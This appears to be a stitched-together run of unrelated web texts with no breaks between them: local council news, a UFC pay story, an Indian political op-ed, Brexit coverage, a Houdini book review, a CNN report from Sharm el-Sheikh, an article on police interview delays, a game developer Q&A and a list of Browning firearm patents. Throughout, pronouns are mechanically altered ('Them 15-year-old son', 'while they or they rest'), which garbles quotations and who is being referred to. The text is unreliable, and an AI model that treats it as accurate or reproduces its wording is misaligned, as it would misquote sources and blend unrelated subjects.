Council passed a resolution trading roads with the state . The city takes on the responsibility for Baker Street , Hartman Road , and Holly Lane , in exchange for Kenton Lands Road and Erlanger-Crescent Springs road .
Council approved changing the zoning of three properties : the former 5/3 bank building , the former Aldi building , and the property which was formerly Joe the Dog Groomer from Neighborhood Commercial-Residential 2 with a development plan to just plain Neighborhood Commercial . A Dollar General store is scheduled to take up some of the property .
City Attorney Jack Gatlin announced that since there were so many cities that were in support of potential litigation against SD-1 , there will be a meeting on Friday to try and reach a settlement . Gatlin acknowledged that sometimes you have to `` arm the missles to negotiate peace '' , and said they sincerely hoped that they could announce good news at the next meeting .
Councilman John Dunhoft had good news of their own . After two years of no Lions carnivals , the Lions will hold their famous festival on Memorial Day weekend , Friday , Saturday , and Sunday , with Kissel Brothers rides and a fish fry and pretty much all the things that people loved about the traditional carnival .
Rob Neuhaus , from the Board of Adjustment , took the oath of office at the meeting , and Sherry Hoffman , who is the City Clerk , also took the oath of office . Tom Cahill , Jr. , received an award for 15 years of service to the city , and Matt Allen , who has served the city in many positions , received an award for 20 years of service .
Written by Patricia A. Scheyer , RCN contributor
Wrestling Observer writer Dave Meltzer had some interesting insight into the whole Nick Diaz UFC 137 saga that has dragged on over the past week . Specifically , Meltzer talked about how much money Diaz lost out on when they were removed from the main event fight with Georges St. Pierre . They were eventually inserted back into the picture in the co-main event against B.J . Penn , but Meltzer thinks they wo n't make much more for that fight than they would have if they had defended their Strikeforce welterweight title against Tyron Woodley . Here 's what they had to say ( WO is subscription-only ) :
Diaz was punished for no-showing in a big way , including being taken out of a fight he 's wanted for years and basically their career in UFC was at stake if they had n't faced Penn , The difference in what he 's going to make fighting Penn in the semifinal with what they would have made against St. Pierre is said to be in the seven figures due to the PPV cut . He 's also out of the title picture , at least for this year . He 's gone from seven figures , even if they lost , to essentially very slightly more than they would have made had they fought Tyron Woodley in Strikeforce for the welterweight title they vacated to get the St. Pierre fight .
For a guy that talks about money so much ( or for anyone really ) , that 's a huge , huge loss .
It might be a plain fact that the Indian Left is in decline . It seems uncontroversial to say that it has lost all sense of direction and become properly insignificant . Insignificance is when a party you seek to ally with tells you to merge with them instead—decimate or dissolve yourself . This was the Aam Admi Party 's response to sections of the Left that wanted an alliance—'No alliance , but you can merge with us . '
And this snub came while the Left was going to town around early 2014 , comparing AAP with Latin American social movements that forged radical-Left coalitions against the `` Washington consensus '' . Prakash Karat of the CPIM claimed AAP is doing precisely what the Left always wanted : `` AAP 's agenda has long been the Communist programme . ''
This Left , also known as the official Left , is dying—thankfully .
Even as it dies this Left gets no sympathy , but in fact arouses revulsion and contempt among many . Contempt—not from the dominant Hindutva forces , whom the Left considers its `` arch enemy '' , but from those regarded oppressed and marginalised—large sections of Dalit leaders and parties . The rise of Majlis-e-Ittehadul Musilmeen ( MIM ) shows that `` minorities '' also likely have a similar attitude towards the `` Left and secular forces '' .
A very critical-minded Dalit-bahujan intellectual , Kancha Ilaiah , recently declared they want the Left to just disappear , vanish . The Left is nothing but a bastion of upper caste domination to him . A radical and progressive mind like Ilaiah 's refuses to engage more analytically , if not sympathetically , with the layered and complex history of the Left in India . This reveals tons of contempt : It is not even that the Left should die to be remembered as `` past '' . It should be buried and forgotten . No wonder , Dalit organisations that align with the Left have pariah status within the community .
The Left arouses contempt since it engages in endless moralising . It does not tire of acting as the self-appointed guardian and custodian of `` democratic values '' and `` constitutional norms '' , all so-called . It specialises in judging others as , say , `` fascist '' or `` opportunist '' , with nothing much going for itself .
Marxist philosopher Fredric Jameson is right in pointing out that the `` traditional Left '' now plays a purely ritualistic function of talking and talking , like a powerless tribal chief of yore . Dressed up as , say , `` free speech '' , this has great ornamental value for a society which lives off its claim of being democratic and free . The Left makes for `` dissenting voices '' , not even biting satire or irony . It contributes to the echo chamber called a `` vibrant democracy '' . What the black Marxist Stuart Hall called `` discursive struggle '' of the Left against the Thatcherite regime in the UK is now an empty signaling function—some of which decomposes further in the age of social media , and appears as `` the moral outrage brigade '' on the Internet .
Left and bhadralok intellectuals declare that Dalit parties have become opportunists and are hankering for power , in alliance with Hindutva forces . Dalit leaders are supposed to have failed to live up to the ideals of Ambedkar . Claiming to understand Ambedkar better , the Left now wants to tell or teach the Dalits who the true Ambedkar is . But then even this moralising in itself might not have aroused Dalit contempt for the Left . Forgetting any of its own principles , the Left now suddenly wants to earn some quick points by being more Ambedkarite than the Ambedkarites . Dalit radicals rightly attack this cheap , populist appropriation of Ambedkar , for whom this might be no different than the RSS or Modi appropriating Ambedkar .
It feels like the Left 's rejection of opportunist politics or of sectarian/identity politics is a sign of its own irrelevance : Indicating that it is out of the game . It is , however , still part of the enlightened social elite , like the social capital of bhadralok liberals comprising 'old money ' and supposed artistic/scholarly excellence . The refinement and hegemonic restraint of the Godard-watching , Tagore-reading liberal is now being challenged by new ascendant elites with `` crass '' tastes and quick consumerism . An elegant , widely-read Nehru replaced by a Mayawati or a Modi . The waning nawabs in Santranj Ke Khiladi went down playing chess—the Left intellectuals can moralise to their graveyards .
In the game of politics today , the Left 's opposition to `` opportunist '' Dalit alliance with Hindutva parties gets easily presented as proof of the Left 's Brahminical character . The Left is placed alongside Brahminical-Hindutva forces . And from this comes the realisation that it is better for Dalits to tactically ally with the powerful Hindutva forces ( and win concessions ) than with the powerless and self-righteous Left . The Left is the name of what Dalits should assiduously avoid !
Being more Ambedkarite than Ambedkarites is a recent move of the Left . An earlier , older , much practiced move is `` being more secular than the secularists '' . The Left believes that the Indian Constitution is a weapon in the hands of the poor and the minorities , offering Nehru 's 1946 Objectives Resolution speech as conclusive proof . This Constitution marks the outer limit of their radical politics . The need to defend `` our secular democracy '' and `` our secular Constitution '' alienates the Left from any real Left-wing agenda . The Constitution and its radical promises have numbed the Left to inaction and complacency , completely boxed inside the rules drawn by the liberal bourgeoisie .
Keeping a watch over appointments in FTII , IIT , NCERT and IIMs have therefore become a major preoccupation of the Left . It only shows how much the Left had come to reproduce itself through official institutions , through directorships and chairpersonships , how so thoroughly official and institutionalised it had become . It pines not for upheaval but for institutional posts and `` institution-building '' . Who knows , Modi might be truly doing yeoman 's service by kicking the Left out of institutions , so that they can again reconnect with the masses . The witch-hunt of progressive NGOs can then be a blessing in disguise , as it can possibly orient left activists towards more political work , away from funded activism .
`` Fighting fascism '' or `` fighting Modi '' is clearly part of the Left 's struggle to retain its institutional power and clout , its share in the pie . In the meantime , defending the Constitution from `` communal-fascists '' has lost all meaning , as Modi sits cosy with the Constitution .
The RSS could claim that it wants to rewrite the Constitution and India 's history . The Left only wants to defend and preserve this history ( secular history ) and this Constitution . The Left is fine with history from the viewpoint of Gandhi or a Nehru rather than rewriting it from the standpoint of a Bhagat Singh or the radicals of the 1946 Bombay Naval Uprising . It wants to fight RSS 's history-writing not with a working class history of India but with `` secular history '' or history written by `` respectable '' historians . It has lost the sense of differentiating `` secular history '' from history from the standpoint of the working class . It claims Ambedkar , but has forgotten its own teachers . It wants to fight `` unbridled capitalism '' with Keynesianism or a pro-MNREGA nanny state , or by reviving a decrepit Planning Commission rather than fight capitalism with socialism/communism .
And , finally , the Left is a complete recipe for `` how not to fight Modi '' , as I have argued earlier . This Left is the `` ideal Left '' conjured up by liberal spin doctors like Ram Guha or secular-progressive talking heads like Mani Shankar Aiyar .
This gives us not even a liberal-Left , but a spineless Left .
The sooner such a Left dies , the better it is for Left politics generally , the better it is for revolutionary struggles in this country . In fact , the Maruti-Suzuki workers struggle ( 2011-12 ) in Manesar showed us how a radical struggle against big capital can be organised bypassing the `` traditional Left '' .
Similarly , the Maoist movement , outside the fold of the traditional Left , is creating serious hurdles for the dominant forces . No amount of stifling foreign funds by Modi 's government can finish off this movement grounded in the class struggle . These third stream Left forces might not be directly training their guns against a Modi or against the ghar wapsi utterances of a Sakshi Maharaj or Yogi Adityanath—but then they are not into winning brownie points by expressing moral outrage . That is not their priority at all . Instead , they do the work of keeping the soil firm for a revolutionary alternative .
Saroj Giri is assistant professor , political science , Delhi University
Wolfgang Schauble is a key ally of German Chancellor Angela Merkel
Britain could be forced to write cheques to Brussels until 2030 despite leaving the EU , the German finance minister has warned .
Wolfgang Schauble delivered their blustering warning as Theresa May flew into Berlin for talks with Angela Merkel and other world leaders .
Mr Schauble said post-Brexit Britain would be bound by tax rules restricting it from granting incentives to keep investors in the country .
They also insisted there will be no special deal to curb freedom of movement if the UK wants to remain part of the common market .
Signalling that the bloc is determined to take a tough line in looming negotiations , Mr Shauble - a key ally of Mrs Merkel - said : 'Until the UK 's exit is complete , Britain will certainly have to fulfil its commitments .
'Possibly there will be some commitments that last beyond the exit… even , in part , to 2030 . '
Mrs May is expected to hold talks with Mrs Merkel and US president Barack Obama - who is on a farewell tour before handing over to Donald Trump in January - during their visit to Berlin .
The mini-summit will also be attended by the leaders of France , Italy and Spain .
Although Brexit is not on the agenda for the talks , the Prime Minister is likely to discuss the issue with European counterparts .
Germany 's hard line approach comes after French President Francois Hollande said in October that Britain must pay a price for severing its ties to Brussels .
Mr Schauble said freedom of movement was a core part of the single market and changing the key principles of the bloc would hit financial services companies .
'There is no a la carte menu , ' they said . 'There is only the whole menu or none .
Prime Minister Theresa May is in Berlin today for meetings with international counterparts including Mrs Merkel and outgoing US President Barack Obama
'Without membership of the internal market , without acceptance of the four basic freedoms of the internal market there can , of course , be no passporting , no free access for financial products or for financial actors . '
Mr Obama yesterday voiced hope that Brexit negotiations would be 'smooth and orderly ' .
The US president notoriously waded into the EU referendum campaign earlier this year by suggesting the UK would go to the 'back of the queue ' for a trade deal with America if it cut ties with Brussels .
They said after meeting Mrs Merkel in Berlin : ' I hope that the negotiations over Britain 's withdrawal from the EU will be conducted in a smooth and orderly and transparent fashion , and will preserve as much as possible the economic and security relationship between the UK and the EU . '
They added : ' I think the European Union is one of the greatest achievements of the world .
'You have to preserve those achievements and fight for them . You ca n't take them for granted . '
In 1918 , Harry Houdini made a fully-grown elephant vanish from the stage of the New York Hippodrome . They could escape from locked boxes , wriggle out of straitjackets while dangling from a crane , and once spent 91 minutes in a galvanised iron coffin submerged at the bottom of a hotel swimming pool , unruffled even when one of the men weighing down the box slipped and the whole thing shot out of the water and somersaulted through the air . Little wonder that their friend , the ardent spiritualist Sir Arthur Conan Doyle , was convinced they possessed the `` divine '' gift of dematerialisation , despite all Houdini 's protestations to the contrary .
This stubborn refusal to doubt the evidence of their senses was entirely characteristic of Conan Doyle . The son of a Scottish alcoholic , they abandoned a career as a doctor to chance it as a writer , first unleashing the pre-eminently rational Sherlock Holmes on the world in 1887 . But as they once observed : `` The doll and its maker are never identical . '' Despite their hearty cricketer 's exterior , Conan Doyle developed an interest in spiritualism that , after the death of their eldest son in the first world war , bloomed into the guiding obsession of their life . Soon , the inventor of the world 's most logical detective was preaching to the nation on life after death , fairies , automatic writing , spirit photography and ectoplasm , as well as publishing books of predictions from their wife 's spirit guide , Pheneas .
Houdini , on the other hand , was a supreme sceptic , pre-empting the likes of Ben Goldacre and James Randi with their medium-busting activities . Born Erik Weisz in Budapest in 1874 , they cut their teeth in the touring medicine shows of the early 20th century , performing their illusions alongside hootchy-kootchy girls , contortionists and sundry sideshow freaks . Several of their co-workers later re-emerged on the lucrative seance scene , converting their skills for stagecraft into an ability to read minds or conjure the lost voices of the dead . From the beginning , this unlikely friendship was established around a mutual interest in the existence of an afterlife . Both men were besotted with their mothers , and after the death of Mrs Weisz , Houdini experimented abortively with seances ( it may , though Sandford does n't say as much , have been this personal knowledge of the bereaved 's vulnerability that drove their later exposés ) . Conan Doyle hoped their new companion would explore what seemed astounding psychic gifts . Unfortunately , Houdini 's training and nature made them unsympathetic to the question of supernatural phenomena . `` Applesauce '' and `` hogwash '' , they commented in private of their friend 's beliefs .
The relationship foundered when they began to debunk mediums publicly , both on stage and under the auspices of Scientific American ( the title of a later work , Miracle Mongers and Their Methods : A Complete Exposé of the Modus Operandi of Fire Eaters , Heat Resisters , Venomous Reptile Defiers , Sword Swallowers , Human Ostriches , Strong Men , Etc , gives a sense of the lively nature of these proceedings ) . Most devastating for Conan Doyle was their investigation of Margery Crandon , an attractive blonde Boston Brahmin who often performed in the nude and apparently secreted ectoplasm in their vagina . Conan Doyle took this exposé as a personal betrayal , and the friendship devolved into a feud carried out mainly via newspapers .
As these lurid details suggest , this is a magnificently rich story , albeit unsatisfactorily told . The first half of the book is dedicated to inching Conan Doyle through their early years , though occasional side glances at Houdini suggest their childhood was considerably more colourful . The men do n't meet until chapter four , while repeated fast-forwards make for a repetition of detail .
More troubling , and stranger , is Sandford 's partisanship on the part of Conan Doyle , whose sweet and sportsmanlike nature apparently trumps their insistence on consoling fantasy over the uncomfortable realities of scientific proof . There are frequent references to Houdini 's diminutive stature , crumpled clothes and inability to spell ( describing themselves as Conan Doyle 's intellectual `` pier '' is a cracker , no doubt ) , all of which would be fine if they were accompanied by the same note of respect that Conan Doyle automatically commands .
It seems self-evident that Houdini 's scepticism was admirable , even if sometimes motivated by a concurrent desire for publicity , and ending the book by congratulating Conan Doyle on their message of hope is palpably absurd . No matter . The self-made illusionist who could n't tolerate a lie remains a bewitchingly impressive figure , however badly dressed they are .
Olivia Laing 's To the River is published by Canongate
Sharm El-Sheikh , Egypt ( CNN ) -- Egypt 's renowned resort town of Sharm el-Sheikh that attracts millions of tourists from around the world is growing tired of its most famous guest : Hosni Mubarak .
The ousted president , say residents , is bad for business .
`` We want them to leave , '' said Ahmed Fahmy , a construction worker who lives here . `` He has created a lot of problems and affected tourism . Tourism is dead now . ''
Added Mohamed Nasr , who runs a limousine service : `` Everbody wants '' Mubarak to leave . `` Tourism now is no good ... My business is nothing now . ''
Fahmy spoke across the street from Sharm el-Sheikh International Hospital , where Mubarak has been staying under heavy police protection since prosecutors began questioning them on Tuesday .
The sight of helmeted riot police forming a human chain of black uniforms around the perimeter of the pyramid-shaped hospital , contrasted sharply with the palm trees , souvenir shops and sun-burned European tourists who wander past , staring curiously at them .
This week , Egypt 's general prosecutor officially detained Mubarak for 15 days in connection with the deaths of hundreds of activists during the street protests that toppled them from power on February 11 . Their two sons , Gamal and Alaa , were transferred to Cairo 's Tora prison this week .
Egypt 's revolution succeeded in toppling a once-untouchable dictator . But it has also crippled the country 's vital tourism industry , which according to some conservative estimates , accounts for 10 % of the Egyptian economy .
Sharm el-Sheikh , an international scuba-diving and nightclubbing mecca that normally welcomes an estimated 5 million tourists a year , has been particularly hit hard .
The beaches in `` Sharm , '' as locals affectionately call it , are all but deserted . The once bustling harbor in Namma Bay is mostly quiet , except for the occasional motorboat puttering past pulling squealing tourists riding inner-tubes .
Hotel operators estimated they were below 30 % capacity at what is normally the peak tourist season .
`` You need to be at 35 % just to break even , '' said Mohamed Abbas , manager of the Iberotel Lido Hotel . In the last half of February , the hotel was at 6 % to 8 % capacity .
Abbas estimated the current free-fall in tourism receipts is worse than decline after three deadly bombings in Egypt 's Sinai in 2004 , and after a series of shark attacks last November .
British tourist Jane Dixon said they did n't think twice about bring their teenage son and daughter to Sharm el-Sheikh .
`` Its no different from the possible threat in London , '' they said , sitting in a rooftop swimming pool with a view of the Red Sea .
`` You 're just as likely to get blown up riding the Tube , '' they added , referring to London 's subway system .
Still , the political instability gripping Cairo kept Dixon from visiting the pyramids .
Them 15-year-old son , Josh , was surprised to see the cordon of riot police outside of the Sharm el-Sheikh 's hospital .
`` It was pretty cool , '' they said . `` I did n't know the president was staying there . There are scary guards all over the place . So I feel pretty safe . ''
Asked why tourists stopped coming , hotel and nightclub operator Adly El Mestekawy had one simple answer : the revolution .
`` For the first time in the history of Egypt for 7,000 years a pharaoh is being investigated . Their whole family is being investigated , '' Mestekawy said .
But Mestekawy , who says they opened the first grocery store and hotel in Sharm el-Sheikh when it was little more than a desert campground in the 1980s , hopes Egypt 's largely peaceful revolution will pay off in the long run .
`` Egypt is no longer enslaved . Egypt is free and open to the world through peaceful means , '' they said . `` This will bring tourists back in large numbers and this is what the country needs . ''
Egypt still has a long way to go before its security forces embrace transparency .
Secret police accosted a CNN camera-man as they were filming a sunset over the Red Sea on Friday . Without showing any identification , the plain-clothed officers tried to confiscate the camera before finally being convinced no state secrets had been filmed .
Not far away , workers outside a souvenir shop called out an often-repeated motto to passing tourists .
`` Welcome to Egypt , '' they said .
Looking for news you can trust ?
Subscribe to our free newsletters .
Last Friday , in a courthouse in New Mexico , special prosecutor Randi McGinn asked police psychologist William Lewinski whether they advised investigators to wait several days before interviewing an officer involved in a shooting . McGinn was asking because two Albuquerque police officers shot and killed a homeless man on March 16 , 2014 , in the foothills of the Sandia Mountains , and they had been told to wait two days before giving a statement . The lag in time seemed odd to McGinn , who is pursuing murder charges against the officers .
Lewinski , founder of the research group Force Science Institute , is a controversial figure among prosecutors like McGinn . Recently , they came under fire for publishing studies that critics said were not subject to peer review , and for using those studies in their work as an expert witness when testifying on behalf of officers involved in shootings . Lewinski responded to McGinn 's question by saying , “ That 's what the professionals and the experts in law also state. ” They added that “ if you can eliminate bias , memory aids such as walking through a scene , looking at video—the things that are currently used in the police practice—do enhance memory . ”
The same day McGinn was interviewing Lewinski in court , cops working one state away , in Arlington , Texas , were dealing with fallout from a police trainee 's fatal shooting of 19-year-old Christian Taylor . Arlington 's police chief explained to reporters that the two officers involved had not yet been interviewed due to a standard department procedure , and that they expected the officers to submit their statements in 7 to 10 days . ( Investigators interviewed one of the officers on Monday . )
Albuquerque and Arlington are not outliers . For years , departments in states like Illinois , Kentucky , Maryland , Oregon , Texas , and Wisconsin have required a waiting period of at least two days . In Dallas , 72 hours must pass . In Baltimore , where six police officers have been charged for their involvement in the death of 25-year-old Freddie Gray , a union contract compels cops to wait 10 days before speaking with investigators .
In the aftermath of controversial police shootings , from Michael Brown to Tamir Rice and Samuel Dubose , the public has repeatedly seen that an officer 's account— ” I almost got run over by the car ” or “ I felt like a five-year-old holding onto Hulk Hogan “ —can have big implications for a case , swaying internal investigators , prosecutors , and grand juries as they determine whether a police shooting was legal or justified . It is unsurprising , then , that over the past year the question of how long officers should wait before giving their accounts has been fiercely debated . Policing experts have raised a number of issues , including , most importantly , the validity of the science—promoted often by Lewinski—behind delaying interviews .
Local officials and union attorneys who embrace the so-called 48-hour rule say stress can interfere with an officer 's ability to recall details . “ The science behind how people remember things , particularly those that are involved in a high-stress , adrenaline-infused situation , has shown that memories can often be inaccurate if they are immediate , ” Sean Smoot , a police union attorney who represents officers in Illinois , testified to the US Commission on Civil Rights in April .
When the civil rights commission pressed Smoot for data supporting their claim , they cited the work of Lewinski and the Force Science Institute . In an April 2014 Force Science newsletter , Lewinski wrote , “ The overall benefit of waiting while they or they rest and emotionally decompresses far outweighs any potential loss of memory. ” What 's more , they said , “ Delay enhances an officer 's ability to more accurately and completely respond to questions . ”
But the science shaping rules about when officers should be interviewed , several policing experts warn , is inconclusive at best , and shaky ground on which to base investigations with potentially criminal outcomes . In fact , a 2010 experiment conducted by University of South Carolina professor Geoffrey Alpert found that an officer 's recollection of threats at the scene actually weakened slightly over time . The scientific conclusions about when officers should be interviewed after a shooting , Alpert says , “ remain blurred . ”
In response to Smoot 's testimony , Samuel Walker , a criminologist at the University of Nebraska in Omaha , reviewed a meta-study of psychological research on the relationship between stress and memory . The 2008 study concluded that “ there is little evidence to support the view that emotional stress is bad for memory , ” Walker wrote . “ Police unions and their advocates have made false and self-serving claims about the scientific evidence on the impact of trauma on memory . ”
When I asked Lewinski about the findings , they referred me to the recommendations of the International Association of Chiefs of Police 's psychological services section . “ That prestigious and knowledgeable group disagrees strongly with Dr. Walker , ” Lewinski said in an email . ( The association 's guidelines on officer-involved shootings do n't quite line up with Lewinski 's 48-hour recommendation ; they state that “ officers should have some recovery time before providing a full formal statement , ” ranging from a few hours to several days , and that “ an officer 's memory will often benefit from at least one sleep cycle prior to being interviewed leading to more coherent and accurate statements . ” )
The science is n't the only concern that policing experts have raised in recent months : In their line of questioning last week , McGinn suggested the delay could give officers an opportunity to review video or “ consult with their peers who were involved before they ever give a statement. ” Walter Katz , a Los Angeles-based attorney focusing on police accountability , told me that “ there 's always the concern about either contamination or having statements which are essentially fabricated. ” And McGinn and others have asked if the delays amount to special treatment a regular citizen would n't be afforded . ( Union officials have pointed out that due process for ordinary civilians does not provide enough protection for law enforcement officers . ) In the fragile atmosphere that tends to follow police shootings , such suspicions could well corrode public trust .
What 's more , rules delaying interviews also overlook the fact that officers may prefer to get their interviews out of the way , says David Klinger , a criminologist at the University of Missouri-St. Louis . “ In the absence of sound scientific evidence , why make them wait ? ”
Lots of folks liked the Q & A from a few weeks back . I had meant to post a second part , but got a little sidelined . Here it is !
Q : What have you been up to since the last Q & A ?
A bunch of stuff :
De-uglifying and polishing a lot of the in-game assets , animations , menu screens , and so on .
Switching our server runtime environment from cpython to pypy for additional speed .
Improving our build/deploy system .
Finishing up the single player menu screens and the flow for clearing missions and unlocking new content .
Completing our single-player cinematic cutscene system .
Rebalancing units like Vivid Drone and Deadeye Operative .
Sound !
Q : How is Lunarch 's cash flow ? Do you guys need more money ?
A : Nothing to worry about yet ; we 're doing OK. We 've been helped immensely by government programs like the Ontario Interactive Digital Media Tech Credit . Prismata does n't generate nearly enough revenue to sustain itself yet , but that 's expected when we 're in pre-launch mode . None of Lunarch 's founders draw a salary from the company ( the opposite is true : we all helped fund it ) , so Lunarch does n't burn a whole lot of cash , and consequently , we 've still got plenty of time . It does mean that some of us have n't seen a paycheque in a very long time , and obviously that is n't sustainable forever , but we 'll have no trouble making it until launch .
Q : Do you have enough money for marketing ?
A : Here 's where things get trickier . We had applied to receive an advance for Marketing and Promotion from the Canadian Media Fund ( not free money , but a repayable loan ) , and we were denied the funds . Many fellow developers I spoke with were very convinced that we 'd get the loan , but alas , the Marketing and Promotion funds are now only open to games whose development/production were funded by the Canadian Media Fund itself , as per a new rule added in 2016 . We never applied for CMF development/production funding because we had raised sufficient funds ourselves , and CMF production/development funding requires developers to pay a massive royalty on profits , similar to that of a regular publisher . As of this year , that now makes us ineligible for CMF 's Marketing and Promotion advance as well ( which is royalty-free ) .
Too bad . The application was a massive pain-in-the-ass too .
Nevertheless , marketing is king , and we feel we can manage an effective marketing campaign without CMF 's help ( or any publisher , for that matter ) . We 'll have to be a bit more careful to spend our marketing dollars effectively , but assuming things go well during early access , we 'll be able to amp up the marketing spend as needed .
Q : What will you spend marketing efforts and funds on ?
A : Lots of things :
PR for sure . We 'll probably hire a PR firm , as we did during our Kickstarter . They helped us get a lot of helpful coverage , like a feature in PC Gamer .
We 'll be heavily emphasizing youtube and streamers , and we will likely be focusing on smaller audiences ( e.g . streamers that get 300-3000 concurrent views ) and perhaps a few very targeted larger streamers .
Very little on paid ads . Maybe some paid reddit ads . I do n't expect that things like facebook ads or Google Adsense will yield a very good return on investment , but we 'll try them to see !
We 'll be probably be sponsoring some tourneys again . Details forthcoming .
Q : Can I help promote Prismata ?
A : Yes ! We 've actually had a few community members demo the game at shows and conferences ( thank you Apooche , Eiko , and Gameking ) , but those opportunities are pretty rare . In the past , the biggest help from community members came from people posting about Prismata on forums and other online communities ; Celerity 's teamliquid post was a huge boon during our Kickstarter . The best time will be right when we launch on Steam Early Access .
Q : How will I be able to help with the Steam Early Access launch ?
A : We 'll be emailing everyone when we 're close to launch with hype materials , free giveaway keys , and so on .
Q : Why do n't you blog more ?
A : It takes a lot of time . That said , I 'm often torn between not wanting to spend too much time blogging and not wanting to let down folks who want to read the blog !
Additionally , I usually blog about stuff that I 'm working on , but a lot of it has not been that blogworthy lately . I guess I could talk about how our multi-node , multi-core server uses synchronized coroutines to preserve message ordering while allowing the server to yield when accessing the database , and how I modified it to detect situations where non-yielding instructions did n't need to acquire locks , and it made certain parts of the code 10 times faster . I suppose there are probably a few of you who might find that interesting , but it 's just not worth the time right now !
I 'm gon na show off some sound effects stuff on the blog soon , I promise !
Q : How come Prismata does n't have Feature X ? When will you be adding it ?
A : We get hundreds of feature requests ( literally ) . We do add many of them , especially those that take only a few minutes to implement ( e.g . adding a counter displaying the total number of replays in the “ My Replays ” menu ) . That said , some features would take hours or days of work , and they 're just too low on the priority list . Prismata needs to get released ! That said , anything that the community has a major interest in will get added eventually , assuming Prismata is a long-term success . We intend to keep working on the game until it no longer makes sense to do so .
Q : Will you be streaming more ? Will there be a regular streaming schedule anytime soon ?
A : Once we 're on Steam , I 'll probably be streaming regularly , at least twice a week .
Q : What about the 20-mission puzzle pack you 've been working on ?
A : It 's done . We 're still deciding whether to release it now or later . I received a few recommendations to release it later to build up some more hype , but it 's looking like our Steam beta will focus heavily on selling founder packs and the 20-mission puzzle pack will be included as a reward . If so , it will need to be in place by then .
We 've been watching closely as Ark : Survival Evolved received heavy criticism for releasing DLC while still in early access . Having a high rating on Steam is very important to us , so we wan na avoid that kind of reaction . Their case is a bit different than ours , though .
Q : Is a reward reset happening ? When ? How does it work ?
A : Yes . Just before we go on Steam Early Access . All skins , emotes , and infusions will be removed from player inventories , and all Shards and other collectibles purchased with real money or unlocked with Reward Codes will be refunded . Additionally , players will receive a bonus quantity of Power Cores , Omnipower Cores , and Shards commensurate with the number of ladder and bot games played during the alpha .
Q : Will there be an option not to reset ? I do n't want to have to open all those Power Cores again !
A : The reset will be mandatory , as there have been huge changes to Prismata 's cosmetic system during the alpha period ( such as rarity changes , price drops , and so on ) . Some players could be advantaged over others if given an option to keep their existing rewards .
However , we 've received a lot of requests from players who do n't wish to open all the cores again , so we 'll be temporarily adding a secret feature to trade in Power Cores for higher tier rewards like Omnipower Cores and Black Cards to speed up the process .
Q : Will ratings and the leaderboard also be reset ?
A : We will not be resetting the ratings , but we might remove some really old names from the leaderboard .
Q : Got a date yet for the Steam Early Access Launch ?
A : Nope , but we 're going to be giving out more Steam access keys soon for folks who want to try it before it 's open to the general public . Keep your eye on the blog !
Got another question ? Ask me on reddit !
See you on the ladder !
What were John Moses Browning 's patent numbers ?
Although all patents are available online from the U.S. Patent Office , those before 1976 are not searchable and can only be accessed by entering their patent numbers .
What are the numbers of John M. Browning 's patents ?
Number Title & note 220271 May 19 , 1879 October 7 , 1879 IMPROVEMENT IN BREECH-LOADING FIRE-ARMS
falling block single shot rifle ; became the Winchester 1885 High Wall and Low Wall 261667 March 20 , 1882 July 25 , 1882 MAGAZINE FIRE-ARM
bolt-action repeating rifle with a tubular magazine [ 1 BrHT ] 282839 September 13 , 1882 August 7 , 1883 MAGAZINE-GUN
lever action , exposed hammer , tubular magazine rifle [ 1 BrHT ] 306577 May 26 , 1884 October 14 , 1884 MAGAZINE FIRE-ARM
lever action repeating rifle that employed sliding vertical locks ; to become the famous Winchester Model 1886 [ 1 BrHT ] 324296 March 5 , 1885 August 11 , 1885 MAGAZINE-GUN
lever action rifle 336287 June 15 , 1885 February 16 , 1886 MAGAZINE FIRE-ARM
lever action repeating shotgun . Known as the Winchester Model 1887 , it was the first successful repeating shotgun . [ 1 BrHT ] 367336 July 12 , 1886 July 26 , 1887 MAGAZINE FIRE-ARM
lever action rifle 385238 December 13 , 1887 June 26 , 1888 MAGAZINE FIRE-ARM
22 caliber pump action repeating rifle ; First marketed as the Winchester Model 1890 [ 1 BrHT ] 441390 June 30 , 1890 November 25 , 1890 MAGAZINE-GUN
Winchester 1893 and 1897 pump action shotguns [ 10 WP ] 465339 August 3 , 1891 December 15 , 1891 MAGAZINE-GUN
Winchester 1892 lever action rifle [ 10 WP ] 471782 January 6 , 1890 March 29 , 1892 AUTOMATIC MAGAZINE-GUN
cap over barrel ( ? ! ) , repeating , gas-operated rifle 471783 August 3 , 1891 March 29 , 1892 MACHINE-GUN
gas-operated machine gun 471784 August 3 , 1891 March 29 , 1892 MACHINE-GUN
gas-operated machine gun 524702 January 19 , 1894 August 21 , 1894 MAGAZINE-GUN
Winchester 1894 lever action rifle [ 10 WP ] 544657 November 7 , 1892 August 20 , 1895 GAS-OPERATED MACHINE-GUN
Colt Model 1895 Automatic Machine Gun . Earned the name Browning Peacemaker during the Spanish-American War [ 1 BrHT ] 544658 March 15 , 1893 August 20 , 1895 GAS-OPERATED MACHINE-GUN 544659 June 17 , 1893 August 20 , 1895 GAS-OPERATED MACHINE-GUN 544660 September 11 , 1898 August 20 , 1895 GAS-OPERATED BREECH-LOADING GUN 545671 April 29 , 1895 September 3 , 1895 MAGAZINE-FIREARM
lever action rifle 549345 November 19 , 1891 November 5 , 1895 BOX-MAGAZINE FIREARM
Winchester 1895 lever action rifle [ 10 WP ] 550778 April 29 , 1895 December 3 , 1895 MAGAZINE-FIREARM
shotgun ( ? ) 552864 November 19 , 1894 January 7 , 1896 MAGAZINE-FIREARM
lever action repeating rifle with a non-detachable box magazine designed for jacketed sharp-nosed bullets . Marketed as the Winchester Model 1895 . [ 1 BrHT ] 577281 March 16 , 1896 February 16 , 1897 MAGAZINE-FIREARM
pump action shotgun ? 580923 September 14 , 1895 April 20 , 1897 FIREARM
pistol 580924 October 31 , 1896 April 20 , 1897 FIREARM
Colt 1900 automatic pistol [ 10 WP ] 580925 October 31 , 1896 April 20 , 1897 FIREARM
pistol 580926 October 31 , 1896 April 20 , 1897 FIREARM 632094 February 17 , 1899 August 29 , 1899 BOLT-GUN
single shot 22 caliber plinking rifle known as the Winchester Model 1900 [ 1 BrHT ] 659507 February 8 , 1900 October 9 , 1900 RECOIL-OPERATED FIREARM
revolutionary autoloading shotgun . It would be manufactured by Fabrique Nationale in 1903 and by Remington Arms Company in 1905 . ( Model 11 ) [ 1 BrHT ] FN/Browning Auto 5 shotgun , also Remington Model 11 [ 10 WP ] 659786 June 6 , 1900 October 16 , 1900 RECOIL-OPERATED FIREARM
first successful autoloading high-power rifle [ 1 BrHT ] ; Remington Arms Company in 1906 as Model 8 660244 November 15 , 1899 October 23 , 1900 MACHINE FOR LOADING FEED BELTS FOR MACHINE GUNS 678937 June 19 , 1900 July 23 , 1901 AUTOMATIC GUN
